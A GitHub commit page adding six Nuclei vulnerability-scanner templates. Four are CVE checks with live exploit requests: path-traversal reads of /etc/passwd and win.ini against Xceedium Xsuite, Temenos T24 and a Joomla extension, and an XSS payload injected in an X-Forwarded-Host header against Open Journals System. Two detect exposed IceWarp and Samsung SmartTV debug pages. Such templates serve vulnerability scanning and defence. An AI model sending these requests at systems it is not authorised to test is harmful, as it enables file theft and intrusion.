-
Notifications
You must be signed in to change notification settings - Fork 670
Commit
This commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
update nuclei-templates 2022-07-12 10:04:1657591449
- Loading branch information
Showing
6 changed files
with
205 additions
and
0 deletions.
There are no files selected for viewing
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,33 @@ | ||
id: CVE-2015-4666 | ||
info: | ||
name: Xceedium Xsuite 2.4.4.5 - Directory Traversal | ||
author: 0x_Akoko | ||
severity: high | ||
description: Directory traversal vulnerability in opm/read_sessionlog.php in Xceedium Xsuite 2.4.4.5 and earlier allows remote attackers to read arbitrary files in the logFile parameter. | ||
reference: | ||
- https://www.modzero.com/advisories/MZ-15-02-Xceedium-Xsuite.txt | ||
- https://www.cvedetails.com/cve/CVE-2015-4666 | ||
- http://packetstormsecurity.com/files/132809/Xceedium-Xsuite-Command-Injection-XSS-Traversal-Escalation.html | ||
- http://www.modzero.ch/advisories/MZ-15-02-Xceedium-Xsuite.txt | ||
classification: | ||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N | ||
cvss-score: 7.5 | ||
cve-id: CVE-2015-4666 | ||
cwe-id: CWE-22 | ||
tags: cve,cve2015,xceedium,xsuite,lfi | ||
|
||
requests: | ||
- method: GET | ||
path: | ||
- "{{BaseURL}}/opm/read_sessionlog.php?logFile=....//....//....//....//etc/passwd" | ||
|
||
matchers-condition: and | ||
matchers: | ||
|
||
- type: regex | ||
regex: | ||
- "root:[x*]:0:0" | ||
|
||
- type: status | ||
status: | ||
- 200 |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,36 @@ | ||
id: CVE-2019-14251 | ||
|
||
info: | ||
name: T24 in TEMENOS Channels R15.01 - Pre Authenticated Path Traversal | ||
author: 0x_Akoko | ||
severity: high | ||
description: An unauthenticated path traversal vulnerability was discovered permitting an attacker to exfiltrate data directly from the T24 web server. | ||
reference: | ||
- https://github.com/kmkz/exploit/blob/master/CVE-2019-14251-TEMENOS-T24.txt | ||
- https://www.cvedetails.com/cve/CVE-2019-14251 | ||
- https://vuldb.com/?id.146815 | ||
classification: | ||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N | ||
cvss-score: 7.5 | ||
cve-id: CVE-2019-14251 | ||
cwe-id: CWE-22 | ||
tags: cve,cve2019,temenos,lfi,unauth | ||
|
||
requests: | ||
- method: GET | ||
path: | ||
- "{{BaseURL}}/WealthT24/GetImage?docDownloadPath=/etc/passwd" | ||
- "{{BaseURL}}/WealthT24/GetImage?docDownloadPath=c:/windows/win.ini" | ||
|
||
matchers-condition: and | ||
matchers: | ||
|
||
- type: regex | ||
regex: | ||
- "root:.*:0:0:" | ||
- "for 16-bit app support" | ||
condition: or | ||
|
||
- type: status | ||
status: | ||
- 200 |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,32 @@ | ||
id: CVE-2019-9922 | ||
info: | ||
name: JE Messenger 1.2.2 Joomla - Directory Traversal | ||
author: 0x_Akoko | ||
severity: high | ||
description: An issue was discovered in the Harmis JE Messenger component 1.2.2 for Joomla. Directory Traversal allows read access to arbitrary files. | ||
reference: | ||
- https://github.com/azd-cert/CVE/blob/master/CVEs/CVE-2019-9922.md | ||
- https://www.cvedetails.com/cve/CVE-2019-9922 | ||
- https://extensions.joomla.org/extension/je-messenger/ | ||
classification: | ||
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N | ||
cvss-score: 7.5 | ||
cve-id: CVE-2019-9922 | ||
cwe-id: CWE-22 | ||
tags: cve,cve2019,joomla,messenger,lfi | ||
|
||
requests: | ||
- method: GET | ||
path: | ||
- "{{BaseURL}}/index.php/component/jemessenger/box_details?task=download&dw_file=../../.././../../../etc/passwd" | ||
|
||
matchers-condition: and | ||
matchers: | ||
|
||
- type: regex | ||
regex: | ||
- "root:[x*]:0:0" | ||
|
||
- type: status | ||
status: | ||
- 200 |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,44 @@ | ||
id: CVE-2022-24181 | ||
|
||
info: | ||
name: PKP Open Journals System 3.3 - Cross-Site Scripting (XSS) | ||
author: lucasljm2001,ekrause | ||
severity: medium | ||
description: | | ||
Detects an XSS vulnerability in Open Journals System. | ||
reference: | ||
- https://www.exploit-db.com/exploits/50881 | ||
- https://github.com/pkp/pkp-lib/issues/7649 | ||
- https://youtu.be/v8-9evO2oVg | ||
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=2022-24181 | ||
- https://nvd.nist.gov/vuln/detail/cve-2022-24181 | ||
classification: | ||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N | ||
cvss-score: 6.1 | ||
cve-id: CVE-2022-24181 | ||
metadata: | ||
verified: true | ||
tags: cve,cve2022,xss,oss,pkp-lib | ||
|
||
requests: | ||
- raw: | ||
- | | ||
GET /iupjournals/index.php/esj HTTP/2 | ||
Host: {{Hostname}} | ||
X-Forwarded-Host: foo"><script>alert(document.domain)</script><x=".com | ||
matchers-condition: and | ||
matchers: | ||
- type: word | ||
part: body | ||
words: | ||
- '<script>alert(document.domain)</script><x=".com/iupjournals' | ||
|
||
- type: word | ||
part: header | ||
words: | ||
- text/html | ||
|
||
- type: status | ||
status: | ||
- 200 |
34 changes: 34 additions & 0 deletions
34
config/nuclei-templates/exposed-panels/icewarp-panel-detect.yaml
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,34 @@ | ||
id: icewarp-panel-detect | ||
|
||
info: | ||
name: IceWarp Panel Detect | ||
author: ritikchaddha | ||
severity: info | ||
metadata: | ||
verified: true | ||
shodan-query: title:"icewarp" | ||
tags: icewarp,panel | ||
|
||
requests: | ||
- method: GET | ||
path: | ||
- "{{BaseURL}}/webmail/" | ||
|
||
matchers-condition: and | ||
matchers: | ||
|
||
- type: word | ||
part: header | ||
words: | ||
- 'IceWarp' | ||
|
||
- type: status | ||
status: | ||
- 200 | ||
|
||
extractors: | ||
- type: regex | ||
part: header | ||
group: 1 | ||
regex: | ||
- 'Server: (.{4,20})' |
26 changes: 26 additions & 0 deletions
26
config/nuclei-templates/technologies/samsung-smarttv-debug.yaml
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,26 @@ | ||
id: samsung-smarttv-debug | ||
info: | ||
name: Samsung SmartTV Debug Config | ||
author: pussycat0x | ||
severity: info | ||
metadata: | ||
verified: true | ||
shodan-query: title:"Debug Config" | ||
tags: samsung,tech,iot | ||
|
||
requests: | ||
- method: GET | ||
path: | ||
- '{{BaseURL}}' | ||
|
||
matchers-condition: and | ||
matchers: | ||
- type: word | ||
words: | ||
- '<title>Debug Config</title>' | ||
- 'MultiScreen Service' | ||
condition: and | ||
|
||
- type: status | ||
status: | ||
- 200 |